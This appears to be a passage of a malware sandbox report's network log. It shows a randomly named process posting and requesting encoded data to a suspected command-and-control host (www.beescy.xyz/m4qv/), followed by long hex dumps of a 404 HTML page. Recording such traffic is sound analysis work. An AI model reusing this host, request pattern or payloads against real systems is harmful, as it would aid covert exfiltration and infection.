                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:19.839409113 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                        Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                        Oct 10, 2024 14:47:19.839432955 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                        Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                        Oct 10, 2024 14:47:19.839452028 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                        Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                        Oct 10, 2024 14:47:19.839469910 CEST896INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                        Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                        Oct 10, 2024 14:47:19.839489937 CEST1236INData Raw: 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c
                                                                                                        Data Ascii: 295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /
                                                                                                        Oct 10, 2024 14:47:19.839505911 CEST1236INData Raw: 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: 4.215" y1="411.146" x2="476.378" y2="411.146" /> </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                        Oct 10, 2024 14:47:19.839545965 CEST448INData Raw: 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22
                                                                                                        Data Ascii: stroke-linecap="round" stroke-miterlimit="10" cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="
                                                                                                        Oct 10, 2024 14:47:19.839562893 CEST1236INData Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                                                        Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
                                                                                                        Oct 10, 2024 14:47:19.839581013 CEST224INData Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
                                                                                                        Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" st
                                                                                                        Oct 10, 2024 14:47:19.844434977 CEST1236INData Raw: 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22
                                                                                                        Data Ascii: roke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10" x1="323.396" y1="236.625" x2="295.285" y2="353.753" /> <circle fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        19192.168.2.450023162.0.213.72805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:21.767229080 CEST10844OUTPOST /m4qv/ HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.beescy.xyz
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.beescy.xyz/m4qv/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 43 30 37 4f 76 32 64 71 56 56 51 34 47 5a 69 6b 4f 51 59 6f 36 36 56 62 6c 65 6f 35 54 6b 5a 7a 44 55 67 64 45 37 35 38 6e 4c 55 67 76 45 73 55 32 47 4a 57 75 51 65 67 6d 66 35 57 6f 35 6d 37 79 4b 50 6a 44 35 68 38 66 43 76 41 4a 6f 6f 39 35 74 46 52 48 71 6b 4d 4a 35 51 71 38 4b 61 47 52 70 31 35 74 6a 58 7a 78 35 41 75 76 53 63 6f 76 38 59 64 57 4b 76 37 62 61 70 51 5a 67 5a 6b 58 37 31 43 74 45 74 55 48 6f 37 4b 43 4e 35 79 66 49 77 6e 53 4e 51 6a 6c 51 51 4b 4b 54 75 69 69 67 64 33 57 69 6c 35 54 67 46 6b 48 58 4c 41 35 69 45 37 70 4f 69 72 54 45 4b 2f 34 4f 4f 69 72 4b 72 6f 48 2f 43 4f 69 6d 45 6e 75 49 65 52 5a 74 31 48 39 41 62 6d 71 33 67 6c 49 45 33 73 35 64 6a 2b 46 33 68 6a 54 4e 75 79 6d 59 6e 77 38 67 6c 4b 77 2b 63 77 64 36 4e 62 62 30 34 35 73 48 58 2b 42 37 33 41 75 65 55 4c 73 4b 79 62 33 7a 52 6d 43 39 72 66 43 52 66 63 73 77 5a 4e 62 4d 47 41 57 52 71 6e 65 44 53 61 46 55 2b 77 63 34 6c 36 50 49 30 6d 55 65 2f 70 2b 34 6b 49 6d 30 7a 77 58 6e 70 42 32 6f 49 32 53 55 51 [TRUNCATED]
                                                                                                        Data Ascii: Sh=C07Ov2dqVVQ4GZikOQYo66Vbleo5TkZzDUgdE758nLUgvEsU2GJWuQegmf5Wo5m7yKPjD5h8fCvAJoo95tFRHqkMJ5Qq8KaGRp15tjXzx5AuvScov8YdWKv7bapQZgZkX71CtEtUHo7KCN5yfIwnSNQjlQQKKTuiigd3Wil5TgFkHXLA5iE7pOirTEK/4OOirKroH/COimEnuIeRZt1H9Abmq3glIE3s5dj+F3hjTNuymYnw8glKw+cwd6Nbb045sHX+B73AueULsKyb3zRmC9rfCRfcswZNbMGAWRqneDSaFU+wc4l6PI0mUe/p+4kIm0zwXnpB2oI2SUQfNQalk0aMsfS/OwejG2ww7rqL2RBJNARwGAfXod1omcZf7MqfoOhOZoZuvpFQUafrF7FIWf2apRIuJcOa5s3KQLoiENa2ZsWJOgw5k39UsFY+XKy+D0WyuRubGXe0MtvjBLgqLe0TFSxjInUo1j2RNVoYrWl8f6y2AmCNjPL/ivd66CGHjf1LJLQ4m1ek4+iCX/HTKv3ge6pNT5lSAsc9IzYmk7jXgDixLnuD+zBzffW2a9bcUi9Y9+lW0UVF/A/Z8xrkdFmSZOSb9L7hvHuMWOO741m1bFqQNYSH1j9F9d17frxQuEcqQGcV5qxYvzskL4rUYe8yn2qoFIjjZdzRi71HuMAuvvlsFyyG4N6w7HBdI8C7O2FBgZuWn1s00qeNhdfaTw9lANCLjqC1vmRy6uJGUpSc7MpItWBtKcp70k4iIeQnyoXxuTJCUYsiEMcmlLM4YdmmxWFYyzJoOXjE5wwm2/14IRLeAKsEZXjPwMflMiWguuNw/DQZuG8GPi/KMqF69TgWUgQeIgVb6I0dOMK53DcRw8cMAbX9Qxv+6XGLsOkaUfZ7S+DstU0fkKn3RVxkGr2jFsViB1JnRb2r0W/7XldcmW+r4pLM/qHJh0fM2Jo/NdQX8Lu+RBVRC/+rH+TOlyN8vE7TTRL79wZGXSL/b8FY+LLLV [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:22.358140945 CEST1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:22 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:22.358167887 CEST1236INData Raw: 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38
                                                                                                        Data Ascii: .196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,
                                                                                                        Oct 10, 2024 14:47:22.358185053 CEST1236INData Raw: 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68
                                                                                                        Data Ascii: 5-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.5
                                                                                                        Oct 10, 2024 14:47:22.358200073 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22
                                                                                                        Data Ascii: <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none"
                                                                                                        Oct 10, 2024 14:47:22.358216047 CEST1236INData Raw: 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20
                                                                                                        Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="48
                                                                                                        Oct 10, 2024 14:47:22.358232021 CEST1236INData Raw: 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 32 34 37 2e 39 35 22 20 79 31 3d 22 35 35 31 2e 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32
                                                                                                        Data Ascii: troke-miterlimit="10" x1="247.95" y1="551.719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miter
                                                                                                        Oct 10, 2024 14:47:22.358313084 CEST1236INData Raw: 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: ="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit=
                                                                                                        Oct 10, 2024 14:47:22.358328104 CEST108INData Raw: 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 35 34 39 2e 38 37 39 22 20 63 79 3d 22 32 39 36 2e 34 30 32 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: <circle fill="#0E0620" cx="549.879" cy="296.402" r="2.651" /> <circle fill="#0E0620
                                                                                                        Oct 10, 2024 14:47:22.358401060 CEST1236INData Raw: 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22
                                                                                                        Data Ascii: " cx="253.29" cy="229.24" r="2.651" /> <circle fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.5
                                                                                                        Oct 10, 2024 14:47:22.358417034 CEST1236INData Raw: 2c 31 34 2e 30 33 35 63 31 34 2e 35 30 34 2c 33 2e 38 38 39 2c 32 33 2e 31 31 2c 31 38 2e 37 39 39 2c 31 39 2e 32 32 31 2c 33 33 2e 33 30 33 6c 2d 31 35 2e 36 39 34 2c 35 38 2e 35 33 37 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33
                                                                                                        Data Ascii: ,14.035c14.504,3.889,23.11,18.799,19.221,33.303l-15.694,58.537C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round
                                                                                                        Oct 10, 2024 14:47:22.363217115 CEST1236INData Raw: 37 2c 32 31 2e 37 34 31 63 2d 37 2e 35 39 36 2c 34 2e 34 31 31 2d 31 37 2e 33 33 2c 31 2e 38 32 39 2d 32 31 2e 37 34 31 2d 35 2e 37 36 37 63 2d 31 2e 37 35 34 2d 33 2e 30 32 31 2d 32 2e 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34
                                                                                                        Data Ascii: 7,21.741c-7.596,4.411-17.33,1.829-21.741-5.767c-1.754-3.021-2.817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        20192.168.2.450024162.0.213.72805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:24.313371897 CEST483OUTGET /m4qv/?Sh=P2TusARkbEgcEs+mDyMHtP9emvoSKlJZWWEgC4tjmOg8nAhT+FFe9yeelcBnkIXwjfDCMJlqRnnZfo12xo8UG7kWIL0+yfipd64llhGw+b1VwhgkmL0TKqs=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.beescy.xyz
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:24.927866936 CEST1236INHTTP/1.1 404 Not Found
                                                                                                        Date: Thu, 10 Oct 2024 12:47:24 GMT
                                                                                                        Server: Apache
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        Content-Length: 16026
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED]
                                                                                                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
                                                                                                        Oct 10, 2024 14:47:24.927916050 CEST1236INData Raw: 31 2d 34 2e 36 36 38 2c 38 2e 34 32 31 2d 39 2e 31 39 36 2c 31 30 2e 30 36 63 2d 39 2e 33 33 32 2c 33 2e 33 37 37 2d 32 36 2e 32 2c 37 2e 38 31 37 2d 34 32 2e 33 30 31 2c 33 2e 35 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e
                                                                                                        Data Ascii: 1-4.668,8.421-9.196,10.06c-9.332,3.377-26.2,7.817-42.301,3.5 s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087
                                                                                                        Oct 10, 2024 14:47:24.927951097 CEST1236INData Raw: 38 35 2d 35 2e 35 35 35 2c 31 34 31 2e 30 38 35 2d 31 32 2e 34 30 38 0a 09 09 09 63 30 2d 33 2e 33 37 38 2d 31 35 2e 33 34 37 2d 34 2e 39 38 38 2d 34 30 2e 32 34 33 2d 37 2e 32 32 35 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                        Data Ascii: 85-5.555,141.085-12.408c0-3.378-15.347-4.988-40.243-7.225" /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,12
                                                                                                        Oct 10, 2024 14:47:24.927987099 CEST1236INData Raw: 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22
                                                                                                        Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <li
                                                                                                        Oct 10, 2024 14:47:24.928023100 CEST896INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 32 36 2e 38 37 31 22 20 79 31 3d 22 33 38 36 2e 31 37 35 22 20 78 32 3d 22 34 33 37 2e 34 37 34 22 20 79 32 3d 22 33 38 36 2e 31 37 35 22 20 2f 3e 0a 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: x1="426.871" y1="386.175" x2="437.474" y2="386.175" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
                                                                                                        Oct 10, 2024 14:47:24.928059101 CEST1236INData Raw: 3d 22 32 33 35 2e 33 38 37 22 20 79 32 3d 22 32 39 35 2e 31 38 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: ="235.387" y2="295.189" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032"
                                                                                                        Oct 10, 2024 14:47:24.928093910 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 78 31 3d 22 34 38 34 2e 32 31 35 22 20 79 31 3d 22 34 31 31 2e 31 34 36 22 20 78 32 3d 22 34 37 36 2e 33 37 38 22 20 79 32 3d 22 34 31 31 2e 31 34 36 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f
